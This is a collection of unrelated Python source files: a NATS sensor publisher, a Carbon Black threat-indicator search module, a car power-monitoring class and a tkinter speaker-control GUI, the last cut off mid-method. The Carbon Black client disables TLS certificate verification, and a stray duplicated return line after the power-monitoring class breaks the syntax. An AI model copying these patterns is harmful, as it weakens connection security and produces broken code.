        await self.communciator.connect(self.args["NATSaddress"])
        self.sensor.skipFrames(self.args["skipFirstNFrames"])
        self.lastFrame = self.sensor.getFrame()
        index = 0
        while not (self.lastFrame is None):
            await self.communciator.sendMessage(self.lastFrame, self.coordinateN, self.coordinateE, self.Name)
            print("Image number " + str(index) + " has been sent!")
            index += 1
            # BUGFIX: was `asyncio.sleep(1 // self.frameRate)` -- integer
            # division truncates to 0 for any frame rate > 1, so the loop
            # never paced itself.  True division honors the configured fps.
            await asyncio.sleep(1 / self.frameRate)
            self.lastFrame = self.sensor.getFrame()

    async def getCommunicator(self):
        """Build and connect a fresh NATS communicator bound to this logic."""
        communciator = NATSCommunication.NATSCommunication()
        communciator.logic = self
        await communciator.connect(self.args["NATSaddress"])
        return communciator

    def getSensor(self):
        """Instantiate the CSV-backed sensor and load the configured data file."""
        sensor = CSVSensor.CSVSensor()
        sensor.loadCVSFile(self.args["CSVFile"])
        return sensor
def asyncoThreading(loop, logic):
    """Thread entry point: adopt *loop* on this thread and drive the sensor
    logic's async main routine to completion."""
    asyncio.set_event_loop(loop)
    main_coro = logic.run(loop)
    loop.run_until_complete(main_coro)
# ---- CLI arguments (all optional, string defaults coerced below) ------------
ag = argparse.ArgumentParser()
ag.add_argument('-p', "--port", required=False, default="9000", help="Port of the service")
ag.add_argument('-n', "--name", required=False, default="First sensor", help="Name of the sensor")
ag.add_argument('-ns', "--NATSaddress", required=False, default="nats://localhost:4222", help="Address of NATS server")
ag.add_argument('-csv', "--CSVFile", required=False, default="dataset.csv", help="Name of csv file to be used as data")
ag.add_argument('-N', "--NorthCoordiante", required=False, default="40.0", help="North Coordinate of sensor")
ag.add_argument('-E', "--EastCoordinate", required=False, default="40.0", help="East coordinate of sensor")
ag.add_argument('-fps', "--FramesPerSecond", required=False, default="1", help="Frames per second")
ag.add_argument('-r', "--serviceRegistryAddress", required=False, default="http://127.0.0.1:8761/", help="Service registry address")
ag.add_argument('-s', "--skipFirstNFrames", required=False, default="0", help="Skip first N data")
args = vars(ag.parse_args())
# Coerce the string values to their real types up front.
args["port"] = int(args["port"])
args["FramesPerSecond"] = int(args["FramesPerSecond"])
args["NorthCoordiante"] = float(args["NorthCoordiante"])
args["EastCoordinate"] = float(args["EastCoordinate"])
args["skipFirstNFrames"] = int(args["skipFirstNFrames"])
#Main program
# The sensor publishing loop runs on a dedicated thread with its own asyncio
# event loop, while cherrypy serves the HTTP API on the main thread.
logic = Logic(args)
loop = asyncio.get_event_loop()
sensorThread = threading.Thread(target=asyncoThreading, args=(loop,logic,))
sensorThread.start()
# Announce this sensor instance to the service registry before serving.
ServiceRegistry.registry("Sensors",args["name"], port= args["port"],serviceRegistryAddress=args['serviceRegistryAddress'])
API = APIGateway.Gateway(logic)
cherrypy.config.update({'server.socket_port': args["port"]})
cherrypy.config.update({'server.socket_host': '0.0.0.0'})
conf = {
    '/': {
        'request.dispatch' : cherrypy.dispatch.MethodDispatcher(),
        'tools.response_headers.on' : True,
        'tools.response_headers.headers' : [('Content-Type', 'text/plain')],
    }
}
# Blocks until server shutdown.
cherrypy.quickstart(API,'/',conf)
|
carbon_black.py | import time, os, sys
import logging
import threading
import datetime
import pprint
import copy
from configparser import ConfigParser
from threading import Lock, Thread
from lib.constants import FA_HOME
from lib.modules import base_module
import lib.cbapi_3 as cbapi_3
log = logging.getLogger()
class CarbonBlack(base_module.BaseModule):
    """Module that searches Carbon Black process data for CRITS indicators.

    ``crits_data`` is shared with other threads (the module owner populates
    ``crits_data['indicators']``), so reads and writes are guarded by
    ``data_lock``.
    """

    def __init__(self):
        """Load module configuration from etc/config.ini and set up state."""
        super().__init__(name='CarbonBlack')
        log.info('Initializing CarbonBlack module.')
        self.config = ConfigParser()
        self.config.read(os.path.join(FA_HOME, "etc", "config.ini"))
        self.working = self.config.get("general", "working_dir")
        self.running = False
        # Dict to track all the crits indicator objects and their status
        self.crits_data = {
            'module_status' : 'initialized',
            'indicators' : {}
        }
        self.data_lock = Lock()
        # CB specific things
        self.cb_url = self.config.get('module_carbonblack', 'url')
        self.cb_token = self.config.get('module_carbonblack', 'token')
        self.cb_time_range = self.config.getint('module_carbonblack', 'time_range')
        self.results_limit = self.config.getint('module_carbonblack', 'results_limit')

    def run(self):
        """Main loop: watch for unprocessed indicators and scan them on a worker thread."""
        self.running = True
        with self.data_lock:
            self.crits_data['module_status'] = 'running'
        while self.running:
            # We need to find indicators that haven't been processed already.
            # NOTE(review): this keys() snapshot is taken without the lock;
            # only the per-cid reads below are locked -- confirm intended.
            cid_list = list(self.crits_data['indicators'].keys())
            unprocessed_cids = []
            for cid in cid_list:
                with self.data_lock:
                    if not self.crits_data['indicators'][cid]['completed']:
                        unprocessed_cids.append(cid)
            # Now we can start a thread to process them
            if len(unprocessed_cids) > 0:
                thread = Thread(target=self.run_cb_scan, name='CarbonBlackScanner')
                thread.start()
                # Wait for the scan to finish, but stay responsive to stop().
                while thread.is_alive() and self.running:
                    time.sleep(2)
            else:
                time.sleep(2)

    def stop(self):
        """Signal the run loop (and the in-progress scan) to exit."""
        log.warning("Caught interrupt. Shutting down carbon_black...")
        self.running = False

    def get_valid_indicator_types(self):
        """Return the CRITS indicator types this module knows how to search."""
        return [
            'Windows - FileName',
            'Hash - MD5',
            'Address - ipv4-addr',
            'URI - Domain Name',
            'Windows - FilePath',
            'Windows - Registry',
            'Account',
            'String - Windows Shell',
        ]

    def run_cb_scan(self):
        """Query Carbon Black for every unprocessed indicator and record results.

        Each indicator is marked completed on success; hits (capped at
        ``results_limit``) are accumulated under the indicator's 'results' key.
        """
        # Create a copy of the crits_data so we don't lock it up for a long time while we
        # wait for the carbon black scans to complete.
        with self.data_lock:
            cid_list = list(self.crits_data['indicators'].keys())
        for cid in cid_list:
            if not self.running:
                # Bail out!
                return
            # Ignore completed indicators
            with self.data_lock:
                if self.crits_data['indicators'][cid]['completed']:
                    continue
            with self.data_lock:
                new_value = self._sanitize_string(self.crits_data['indicators'][cid]['value'], self.crits_data['indicators'][cid]['type'])
            # Restrict the search to the configured trailing time window.
            time_search = 'server_added_timestamp:[{0} TO *]'.format((datetime.datetime.utcnow() - datetime.timedelta(days=self.cb_time_range)).strftime('%Y-%m-%dT%H:%M:%S'))
            cb = cbapi_3.CbApi(self.cb_url, token=self.cb_token, ssl_verify=False)
            try:
                search = "{} {}".format(new_value, time_search)
                procs = cb.process_search(search)
                log.info("CarbonBlack search: {} returned {} results.".format(search, procs['total_results']))
                if procs['total_results'] == 0:
                    with self.data_lock:
                        self.crits_data['indicators'][cid]['status'] = 'Analyzed'
                        self.crits_data['indicators'][cid]['completed'] = True
                elif procs['total_results'] > 0:
                    with self.data_lock:
                        # We have hits, so set to 'In Progress'
                        self.crits_data['indicators'][cid]['status'] = 'In Progress'
                        # Now gather results data to send to ACE
                        if 'results' not in self.crits_data['indicators'][cid]:
                            self.crits_data['indicators'][cid]['results'] = []
                        _results_data = {}
                        _results_data['search'] = search
                        _results_data['hits'] = []
                        _results_data['total_hits'] = procs['total_results']
                        current_count = 0
                        for result in procs['results']:
                            # BUGFIX: was `>`, which collected results_limit + 1
                            # hits before breaking.
                            if current_count >= self.results_limit:
                                break
                            current_count += 1
                            _results_data['hits'].append(result)
                        self.crits_data['indicators'][cid]['results'].append(_results_data)
                        self.crits_data['indicators'][cid]['completed'] = True
                else:
                    log.error('Received total_results less than 0. WTF?')
            except Exception as e:
                # Deliberate best-effort: a failed search is logged and the
                # indicator is still marked Analyzed so it is not retried forever.
                log.error("{} FAILED. {}".format(new_value, str(e)))
                log.error("Indicator ID was: {}".format(cid))
                log.info("Enabling indicator {}".format(cid))
                with self.data_lock:
                    self.crits_data['indicators'][cid]['status'] = 'Analyzed'
                    self.crits_data['indicators'][cid]['completed'] = True
        log.info('CarbonBlack searches complete.')

    def _sanitize_string(self, value, ind_type):
        """Turn an indicator value into a CB query term for its type.

        Typed indicators get a field prefix; everything else is quoted with
        CB-significant characters escaped.
        """
        if ind_type == 'Hash - MD5':
            value = 'md5:' + value
            return value
        if ind_type == 'Address - ipv4-addr':
            value = 'ipaddr:' + value
            return value
        if ind_type == 'URI - Domain Name':
            value = 'domain:' + value
            return value
        if '"' in value:
            value = value.replace('"', '\\"')
        if '(' in value:
            value = value.replace('(', '\\(')
        if ')' in value:
            value = value.replace(')', '\\)')
        value = '"' + value + '"'
        #if '(' in value:
        #    value = value.replace('\\(')
        return value
|
power_monitoring.py | import random
import threading
import time
from statistics import mean
from cereal import log
from common.params import Params, put_nonblocking
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE
from selfdrive.swaglog import cloudlog
from common.op_params import opParams
CAR_VOLTAGE_LOW_PASS_K = 0.091  # LPF gain for 5s tau (dt/tau / (dt/tau + 1))
# A C2 uses about 1W while idling, and 30h seens like a good shutoff for most cars
# While driving, a battery charges completely in about 30-60 minutes
CAR_BATTERY_CAPACITY_uWh = 30e6
CAR_CHARGING_RATE_W = 45
VBATT_PAUSE_CHARGING = 11.0  # Lower limit on the LPF car battery voltage
VBATT_INSTANT_PAUSE_CHARGING = 7.0  # Lower limit on the instant car battery voltage measurements to avoid triggering on instant power loss
# Max offroad time (seconds) before charging is disabled.
# NOTE(review): computed once at import time from the opParams
# 'disable_charging' value (hours); changing the param requires a restart.
MAX_TIME_OFFROAD_S = round(3600 * opParams().get('disable_charging'))
MIN_ON_TIME_S = 3600  # minimum uptime (s) before auto-shutdown unless a drive was seen
class PowerMonitoring:
    """Track device and car-battery energy use to decide when to stop
    charging or shut down.

    All integration state is guarded by ``integration_lock`` because the
    pulsed measurement runs on a separate thread.
    """

    def __init__(self):
        self.params = Params()
        self.last_measurement_time = None  # Used for integration delta
        self.last_save_time = 0  # Used for saving current value in a param
        self.power_used_uWh = 0  # Integrated power usage in uWh since going into offroad
        self.next_pulsed_measurement_time = None
        self.car_voltage_mV = 12e3  # Low-passed version of pandaState voltage
        self.car_voltage_instant_mV = 12e3  # Last value of pandaState voltage
        self.integration_lock = threading.Lock()
        # Restore the persisted car battery estimate (may be absent on first boot).
        car_battery_capacity_uWh = self.params.get("CarBatteryCapacity")
        if car_battery_capacity_uWh is None:
            car_battery_capacity_uWh = 0
        # Reset capacity if it's low
        self.car_battery_capacity_uWh = max((CAR_BATTERY_CAPACITY_uWh / 10), int(car_battery_capacity_uWh))

    # Calculation tick
    def calculate(self, pandaState):
        """Update voltage filters and integrate power/charge for one tick.

        ``pandaState`` is the latest panda state message (or None when no
        panda is attached).  Exceptions are swallowed and logged so a bad
        tick never kills the caller's loop.
        """
        try:
            now = sec_since_boot()
            # If pandaState is None, we're probably not in a car, so we don't care
            if pandaState is None or pandaState.pandaState.pandaType == log.PandaState.PandaType.unknown:
                with self.integration_lock:
                    self.last_measurement_time = None
                    self.next_pulsed_measurement_time = None
                    self.power_used_uWh = 0
                return
            # Low-pass battery voltage
            self.car_voltage_instant_mV = pandaState.pandaState.voltage
            self.car_voltage_mV = ((pandaState.pandaState.voltage * CAR_VOLTAGE_LOW_PASS_K) + (self.car_voltage_mV * (1 - CAR_VOLTAGE_LOW_PASS_K)))
            # Cap the car battery power and save it in a param every 10-ish seconds
            self.car_battery_capacity_uWh = max(self.car_battery_capacity_uWh, 0)
            self.car_battery_capacity_uWh = min(self.car_battery_capacity_uWh, CAR_BATTERY_CAPACITY_uWh)
            if now - self.last_save_time >= 10:
                put_nonblocking("CarBatteryCapacity", str(int(self.car_battery_capacity_uWh)))
                self.last_save_time = now
            # First measurement, set integration time
            with self.integration_lock:
                if self.last_measurement_time is None:
                    self.last_measurement_time = now
                    return
            if (pandaState.pandaState.ignitionLine or pandaState.pandaState.ignitionCan):
                # If there is ignition, we integrate the charging rate of the car
                with self.integration_lock:
                    self.power_used_uWh = 0
                    integration_time_h = (now - self.last_measurement_time) / 3600
                    if integration_time_h < 0:
                        raise ValueError(f"Negative integration time: {integration_time_h}h")
                    self.car_battery_capacity_uWh += (CAR_CHARGING_RATE_W * 1e6 * integration_time_h)
                    self.last_measurement_time = now
            else:
                # No ignition, we integrate the offroad power used by the device
                is_uno = pandaState.pandaState.pandaType == log.PandaState.PandaType.uno
                # Get current power draw somehow
                current_power = HARDWARE.get_current_power_draw()  # pylint: disable=assignment-from-none
                if current_power is not None:
                    pass
                elif HARDWARE.get_battery_status() == 'Discharging':
                    # If the battery is discharging, we can use this measurement
                    # On C2: this is low by about 10-15%, probably mostly due to UNO draw not being factored in
                    current_power = ((HARDWARE.get_battery_voltage() / 1000000) * (HARDWARE.get_battery_current() / 1000000))
                elif (self.next_pulsed_measurement_time is not None) and (self.next_pulsed_measurement_time <= now):
                    # TODO: Figure out why this is off by a factor of 3/4???
                    FUDGE_FACTOR = 1.33
                    # Turn off charging for about 10 sec in a thread that does not get killed on SIGINT, and perform measurement here to avoid blocking thermal
                    def perform_pulse_measurement(now):
                        # Runs on its own thread; writes back via _perform_integration.
                        try:
                            HARDWARE.set_battery_charging(False)
                            time.sleep(5)
                            # Measure for a few sec to get a good average
                            voltages = []
                            currents = []
                            for _ in range(6):
                                voltages.append(HARDWARE.get_battery_voltage())
                                currents.append(HARDWARE.get_battery_current())
                                time.sleep(1)
                            current_power = ((mean(voltages) / 1000000) * (mean(currents) / 1000000))
                            self._perform_integration(now, current_power * FUDGE_FACTOR)
                            # Enable charging again
                            HARDWARE.set_battery_charging(True)
                        except Exception:
                            cloudlog.exception("Pulsed power measurement failed")
                    # Start pulsed measurement and return
                    threading.Thread(target=perform_pulse_measurement, args=(now,)).start()
                    self.next_pulsed_measurement_time = None
                    return
                elif self.next_pulsed_measurement_time is None and not is_uno:
                    # On a charging EON with black panda, or drawing more than 400mA out of a white/grey one
                    # Only way to get the power draw is to turn off charging for a few sec and check what the discharging rate is
                    # We shouldn't do this very often, so make sure it has been some long-ish random time interval
                    self.next_pulsed_measurement_time = now + random.randint(120, 180)
                    return
                else:
                    # Do nothing
                    return
                # Do the integration
                self._perform_integration(now, current_power)
        except Exception:
            cloudlog.exception("Power monitoring calculation failed")

    def _perform_integration(self, t, current_power):
        """Accumulate ``current_power`` (W) over the interval since the last
        measurement into device usage and car-battery drain (both in uWh)."""
        with self.integration_lock:
            try:
                if self.last_measurement_time:
                    integration_time_h = (t - self.last_measurement_time) / 3600
                    power_used = (current_power * 1000000) * integration_time_h
                    if power_used < 0:
                        raise ValueError(f"Negative power used! Integration time: {integration_time_h} h Current Power: {power_used} uWh")
                    self.power_used_uWh += power_used
                    self.car_battery_capacity_uWh -= power_used
                    self.last_measurement_time = t
            except Exception:
                cloudlog.exception("Integration failed")

    # Get the power usage
    def get_power_used(self):
        # Integrated offroad device usage since ignition-off, in uWh.
        return int(self.power_used_uWh)

    def get_car_battery_capacity(self):
        # Current estimate of remaining car battery energy, in uWh.
        return int(self.car_battery_capacity_uWh)

    # See if we need to disable charging
    def should_disable_charging(self, pandaState, offroad_timestamp):
        """Return True when charging should be paused (too long offroad, low
        car voltage, or depleted estimated battery) -- only while ignition is
        off, the harness is connected, and power-down isn't disabled."""
        if pandaState is None or offroad_timestamp is None:
            return False
        now = sec_since_boot()
        disable_charging = False
        disable_charging |= (now - offroad_timestamp) > MAX_TIME_OFFROAD_S
        disable_charging |= (self.car_voltage_mV < (VBATT_PAUSE_CHARGING * 1e3)) and (self.car_voltage_instant_mV > (VBATT_INSTANT_PAUSE_CHARGING * 1e3))
        disable_charging |= (self.car_battery_capacity_uWh <= 0)
        disable_charging &= (not pandaState.pandaState.ignitionLine and not pandaState.pandaState.ignitionCan)
        disable_charging &= (not self.params.get_bool("DisablePowerDown"))
        disable_charging &= (pandaState.pandaState.harnessStatus != log.PandaState.HarnessStatus.notConnected)
        disable_charging |= self.params.get_bool("ForcePowerDown")
        return disable_charging

    # See if we need to shutdown
    def should_shutdown(self, pandaState, offroad_timestamp, started_seen):
        """Return True when the device should power off: charging already
        stopped, or device battery nearly empty and not charging."""
        if pandaState is None or offroad_timestamp is None:
            return False
        now = sec_since_boot()
        panda_charging = (pandaState.pandaState.usbPowerMode != log.PandaState.UsbPowerMode.client)
        BATT_PERC_OFF = 10
        should_shutdown = False
        # Wait until we have shut down charging before powering down
        should_shutdown |= (not panda_charging and self.should_disable_charging(pandaState, offroad_timestamp))
        should_shutdown |= ((HARDWARE.get_battery_capacity() < BATT_PERC_OFF) and (not HARDWARE.get_battery_charging()) and ((now - offroad_timestamp) > 60))
        should_shutdown &= started_seen or (now > MIN_ON_TIME_S)
        return should_shutdown
return should_shutdown
|
sender.py | import datetime
import json
import os
import socket
import threading
import time
import tkinter as tk
import wave
from tkinter import filedialog, messagebox, ttk
from tkinter.ttk import Combobox, Entry, Progressbar
import tkinter.font as tkFont
import pyaudio
import scipy.io.wavfile as wav
from PIL import Image, ImageTk
import selectors
import struct
# Absolute path to the window icon, resolved relative to this script.
# NOTE(review): backslash separators make this Windows-only.
logo_png = os.path.dirname(os.path.realpath(__file__))+'\\assets\\logo-select.ico'
# Global flag set by MainButton.stop()/alarm() to signal playback pause.
pausing = False
class MainWindow(object):
    """Top-level window of the WiFi Sender app.

    Builds the main menu (Emergency Alarm / Hourly Bell / Live Announcement),
    settings/exit buttons, and a live clock.  The feature buttons stay
    disabled until a speaker selection exists (tracked via the module-level
    bool1/bool2/bool3 BooleanVars -- defined elsewhere in this file).
    """
    def __init__(self, master):
        self.master = master
        self.master.geometry("500x500")
        self.master.title("Electors WiFi Sender")
        self.master.iconbitmap(r'{}'.format(logo_png))
        self.frame = tk.Frame(master)
        self.frame.pack(fill="both", expand=True)
        self.frame.configure(background="orange")
        self.frame1 = tk.Frame(self.frame)
        self.frame1.configure(background= "orange")
        self.frame1.place(relx=0.5, rely=0.5, anchor="center", height=500, width=500)
        # Owns the control socket and the send-command helpers.
        self.mbutton = MainButton(self.frame1)
        self.frames = {}
        b0 = tk.Button(self.frame1, text="Setting", command=self.setting_window, fg='black', bg="white",
                       relief='solid',
                       font=('arial', 10, 'bold'), width='6',
                       height='1')
        self.b1 = tk.Button(self.frame1, text='Emergency Alarm', command=self.emergency_window, fg='black',
                            bg='white', relief='solid',
                            width=25, font=('arial', 19, 'bold'))
        self.b2 = tk.Button(self.frame1, text='Hourly Bell', command=self.hourlybell_window, fg='black',
                            bg='white', relief='solid',
                            width=25,
                            font=('arial', 19, 'bold'))
        b3 = tk.Button(self.frame1, text="Exit", command=self.quiting, fg='black', bg="white",
                       relief='solid',
                       font=('arial', 10, 'bold'), width='6',
                       height='1')
        self.b4 = tk.Button(self.frame1, text='Live Anouncement', command=self.live_window, fg='black', bg='white', relief='solid',
                            width=25, font=('arial', 19, 'bold'))
        self.b5 = tk.Button(self.frame1, text='Refresh', command=self.refresh_window, fg='black', bg='white', relief='solid',
                            width=10, font=('arial', 12, 'bold'))
        L1 = tk.Label(self.frame1, text="WiFi Sender", font=('arial', 15, 'bold'), bg='orange')
        L1.place(relx=.5, rely=0.06, anchor="center")
        b0.place(x=0, y=0)
        b3.place(x=2, relx=0.88, rely=0)
        self.b1.place(relx=0.5, rely=0.2, anchor='center')
        self.b2.place(relx=0.5, rely=0.4, anchor='center')
        self.b4.place(relx=0.5, rely=0.6, anchor='center')
        self.b5.place(relx=0.5, rely=0.9, anchor='center')
        # Static date label plus a self-updating clock (see show_clk).
        today = str(datetime.date.today())
        self.clock = tk.Label(self.frame1, font=('arial', 10, 'bold'), fg='black', bg='white', width=12)
        self.date = tk.Label(self.frame1, text=today, font=('arial', 10, 'bold'), fg='black', bg='white', width=12)
        self.clock.place(relx=0.75, rely=0.8, anchor='center')
        self.date.place(relx=0.25, rely=0.8, anchor='center')
        # Features are disabled until a speaker is selected in settings.
        self.b1['state'] = 'disabled'
        self.b2['state'] = 'disabled'
        self.b4['state'] = 'disabled'
        self.show_clk()
        # Tracks whether the settings Toplevel has been created already.
        self.gone_ = False

    def refresh_window(self):
        """Re-read the speaker selection flags and enable/disable features."""
        self.x = bool1.get()
        self.y = bool2.get()
        self.z = bool3.get()
        if self.x or self.y or self.z:
            self.b1['state'] = 'normal'
            self.b2['state'] = 'normal'
            self.b4['state'] = 'normal'
        else:
            self.b1['state'] = 'disabled'
            self.b2['state'] = 'disabled'
            self.b4['state'] = 'disabled'

    def quiting(self):
        # Destroy the root window, ending the app.
        self.master.destroy()

    def hide(self):
        # Hide (don't destroy) the main window while a sub-page is open.
        self.master.withdraw()

    def setting_window(self):
        """Open the settings page, creating it on first use and re-showing
        the existing Toplevel afterwards; recreate it if it was destroyed."""
        if not self.gone_:
            self.hide()
            self.page1 = PageOne(self)
            w = self.page1.prove()
            self.gone_ = w
        else:
            if self.page1 != None:
                w = self.page1.show()
                self.gone_ = w
                if w == False:
                    # The old page was destroyed; build a fresh one.
                    self.setting_window()

    def emergency_window(self):
        self.hide()
        PageTwo(self)

    def hourlybell_window(self):
        self.hide()
        PageThree(self)

    def live_window(self):
        self.hide()
        PageFour(self)

    def show(self):
        """Bring the main window back after a sub-page closes."""
        #self.master.state("zoomed")
        self.master.update()
        self.master.deiconify()

    def show_clk(self):
        """Update the clock label and reschedule itself every second."""
        timenow = time.strftime('%H:%M:%S %p')
        self.clock['text'] = timenow
        #self.clock.config(text=timer)
        self.clock.after(1000, self.show_clk)
class MainButton(object):
    """Owns the TCP control socket and issues the plain-text commands
    ('stop', 'alarm', 'live') understood by the receiver."""

    def __init__(self, master):
        self.master = master
        # Marker file whose presence means a sound file has been selected.
        self.f = 'name.txt'
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    def _runn(self):
        """Keep retrying the receiver connection every 2s until it succeeds."""
        while True:
            self.ip = None   # placeholder -- receiver address not configured here
            self.port = None
            self.addr = (self.ip, self.port)
            try:
                self.sock.connect(self.addr)
            except Exception as exc:
                print(exc)
                time.sleep(2)
            else:
                return

    def error1(self):
        """Pop a modal error telling the user to pick a file first."""
        hidden_root = tk.Tk()
        hidden_root.withdraw()
        messagebox.showerror("Error", "Action is undone! \nSelect a file first")

    def exit1(self):
        exit()

    def stop(self):
        """Pause playback and tell the receiver to stop."""
        global pausing
        pausing = True
        self.sock.send('stop'.encode('ascii'))
        time.sleep(0.1)

    def alarm(self):
        """Trigger the emergency alarm, provided a file was selected before."""
        if os.path.exists(self.f):
            global pausing
            pausing = True
            self.sock.send('alarm'.encode('ascii'))
            time.sleep(0.1)
        else:
            self.error1()

    def live(self):
        """Switch the receiver to live mode and open the live audio client."""
        self.sock.send('live'.encode('ascii'))
        time.sleep(2)
        Live_Client(None, None)
#Settings
class PageOne(tk.Toplevel):
    """Settings window: collect IP/port for up to two speakers and choose
    which one(s) to connect to.

    Reads/writes the module-level Tk variables (ip_input, port_input,
    ip_input_1, port_input_1, bool1..bool3, _conn1.._conn4) defined elsewhere
    in this file.
    """
    def __init__(self, master):
        self.master1 = master
        tk.Toplevel.__init__(self)
        self.geometry("500x500")
        self.title("Settings")
        #self.state("zoomed")
        self.frame = tk.Frame(self)
        self.frame.pack(fill="both", expand=True)
        self.frame.configure(background="white")
        self.frame1 = tk.Frame(self.frame)
        self.frame1.configure(background="orange")
        self.frame1.place(relx=0.5, rely=0.5, anchor="center", height=500, width=500)
        L1 = tk.Label(self.frame1, text="Speaker 1: ", font=('arial', 15, 'bold'), bg="orange")
        L2 = tk.Label(self.frame1, text="Speaker 2: ", font=('arial', 15, 'bold'), bg='orange')
        L3 = tk.Label(self.frame1, text="SETTINGS", font=('arial', 15, 'bold'), bg='orange')
        L4 = tk.Label(self.frame1, text="Option to Connect: -S1 (Speaker 1) -S2 (Speaker 2)", font=('arial', 10, 'bold'),
                      bg='orange')
        L5 = tk.Label(self.frame1, text=":", font=('arial', 15, 'bold'), bg='orange')
        L6 = tk.Label(self.frame1, text=":", font=('arial', 15, 'bold'), bg='orange')
        L7 = tk.Label(self.frame1, text="IP Address", font=('arial', 12, 'bold'), bg='orange')
        L8 = tk.Label(self.frame1, text="Port", font=('arial', 12, 'bold'), bg='orange')
        # The "Set" buttons act as latches: sunken == address confirmed.
        self.set_button1 = tk.Button(self.frame1, text='Set', command=self.toggle_button_1, fg='black',
                                     relief='raised', bg='white', width=6, height=1, font=('arial', 10, 'bold'))
        self.set_button2 = tk.Button(self.frame1, text='Set', command=self.toggle_button_2, fg='black',
                                     relief='raised', bg='white', width=6, height=1, font=('arial', 10, 'bold'))
        set_button4 = tk.Button(self.frame1, text='Back', command=self.backOpt, fg='black',
                                bg='white', relief='solid', width=6, height=1, font=('arial', 10, 'bold'))
        E1 = Entry(self.frame1, font=('arial', 15, 'bold'), textvariable=ip_input, width=14)
        E2 = tk.Entry(self.frame1, font=('arial', 15, 'bold'), textvariable=ip_input_1, width=14)
        E1_1 = tk.Entry(self.frame1, font=('arial', 15, 'bold'), textvariable=port_input, width=5)
        E1_2 = tk.Entry(self.frame1, font=('arial', 15, 'bold'), textvariable=port_input_1, width=5)
        self.switch_variable = tk.StringVar()
        self.both_button = tk.Radiobutton(self.frame1, text="BOTH", variable=self.switch_variable,
                                          command=self.selected_serv, indicatoron=False, value="both", width=8, font=('arial', 10, 'bold'))
        self.s1_button = tk.Radiobutton(self.frame1, text="S1 Only", variable=self.switch_variable,
                                        command=self.selected_serv, indicatoron=False, value="s1", width=8, font=('arial', 10, 'bold'))
        self.s2_button = tk.Radiobutton(self.frame1, text="S2 Only", variable=self.switch_variable,
                                        command=self.selected_serv, indicatoron=False, value="s2", width=8, font=('arial', 10, 'bold'))
        path1 = os.path.dirname(os.path.realpath(__file__))+'\\assets\\logo-final.png'
        path2 = os.path.dirname(os.path.realpath(__file__))+'\\assets\\elector_logo.gif'
        path3 = os.path.dirname(os.path.realpath(__file__))+'\\assets\\setting_logo.gif'
        load_img = Image.open(path1)
        load_img2 = Image.open(path2)
        load_img3 = Image.open(path3)
        wd = 70
        ht = 70
        wd1 = 80
        ht1 = 80
        # NOTE(review): Image.ANTIALIAS was removed in Pillow 10 (use
        # Image.LANCZOS there); left as-is for the pinned Pillow version.
        img_res2 = load_img2.resize((wd, ht), Image.ANTIALIAS)
        img_res1 = load_img.resize((wd1, ht1), Image.ANTIALIAS)
        img_res3 = load_img3.resize((wd, ht), Image.ANTIALIAS)
        get_img = ImageTk.PhotoImage(img_res1)
        img_logo = tk.Label(self.frame1, image=get_img, bg="orange")
        get_img2 = ImageTk.PhotoImage(img_res2)
        img_logo2 = tk.Label(self.frame1, image=get_img2, bg="orange")
        get_img3 = ImageTk.PhotoImage(img_res3)
        img_logo3 = tk.Label(self.frame1, image=get_img3, bg='orange')
        # Keep references on the widgets so the PhotoImages aren't GC'd.
        img_logo.image = get_img
        img_logo2.image = get_img2
        img_logo3.image = get_img3
        img_logo.place(relx=0.1, rely=0.15, anchor="w")
        img_logo2.place(relx=0.73, rely=0.14, anchor="w")
        img_logo3.place(relx=0.42, rely=0.14, anchor="w")
        self.both_button.place(relx=.7, rely=.8, anchor="center")
        self.s1_button.place(relx=.3, rely=.8, anchor="center")
        self.s2_button.place(relx=.5, rely=.8, anchor="center")
        L1.place(relx=.15, rely=.3, anchor="center")
        L2.place(relx=.15, rely=.5, anchor="center")
        L3.place(relx=.5, rely=0.03, anchor="center")
        L4.place(relx=.04, rely=.70, anchor="w")
        L5.place(relx=.60, rely=.3, anchor="center")
        L6.place(relx=.60, rely=.5, anchor="center")
        L7.place(relx=.42, rely=.24, anchor="center")
        L8.place(relx=.67, rely=.24, anchor="center")
        self.set_button1.place(relx=.84, rely=.3, anchor="center")
        self.set_button2.place(relx=.84, rely=.5, anchor="center")
        #set_button3.place(relx=.7, rely=.8, anchor="center")
        set_button4.place(x=0, y=0)
        #set_button5.place(relx=.3, rely=.8, anchor="center")
        #set_button6.place(relx=.5, rely=.8, anchor="center")
        E1.place(relx=.42, rely=.3, anchor="center")
        E2.place(relx=.42, rely=.5, anchor="center")
        E1_1.place(relx=.68, rely=.3, anchor="center")
        E1_2.place(relx=.68, rely=.5, anchor="center")
        port_input.set(00000)
        port_input_1.set(00000)
        ip_input.set("")
        ip_input_1.set("")
        self.s1_on = False
        self.s2_on = False
        self.both_on = False
        # Connection choices stay disabled until their address is "Set".
        self.s1_button['state'] = 'disabled'
        self.s2_button['state'] = 'disabled'
        self.both_button['state'] = 'disabled'

    def selected_serv(self):
        """Apply the chosen speaker selection: publish it via the module-level
        bool/_conn Tk variables, then move on to the connect page."""
        x = self.switch_variable.get()
        ip1 = ip_input.get()
        po1 = port_input.get()
        ip2 = ip_input_1.get()
        po2 = port_input_1.get()
        ip_t1 = 'IP Address 1: '+ip1
        po_t1 = 'Port Address 1: '+str(po1)
        ip_t2 = 'IP Address 2: '+ip2
        po_t2 = 'Port Address 2: '+str(po2)
        if (x == 's1'):
            bool1.set(True)
            bool2.set(False)
            bool3.set(False)
            _conn1.set(ip_t1)
            _conn2.set(po_t1)
            _conn3.set('IP Address 2: '+'Not available')
            _conn4.set('Port Address 2:'+'Not available')
            self.goto_connect()
        elif x == 's2':
            bool1.set(False)
            bool2.set(True)
            bool3.set(False)
            _conn1.set('Not available')
            _conn2.set('Port Address 2:'+'Not available')
            _conn3.set(ip_t2)
            _conn4.set(po_t2)
            self.goto_connect()
        elif x == 'both':
            bool1.set(False)
            bool2.set(False)
            bool3.set(True)
            _conn1.set(ip_t1)
            _conn2.set(po_t1)
            _conn3.set(ip_t2)
            _conn4.set(po_t2)
            self.goto_connect()

    def toggle_button_1(self):
        """Validate speaker 1's address fields and toggle its 'Set' latch."""
        i1 = ip_input.get()
        p1 = port_input.get()
        # BUGFIX: these comparisons used `is` (object identity), which is not
        # guaranteed for str/int values and is a SyntaxWarning on
        # CPython >= 3.8.  Use value equality instead.
        if (i1 == '') and (p1 == 0):
            print("Wrong")
        elif p1 == 0:
            print("wrong")
        elif i1 == '':
            print('WRong')
        else:
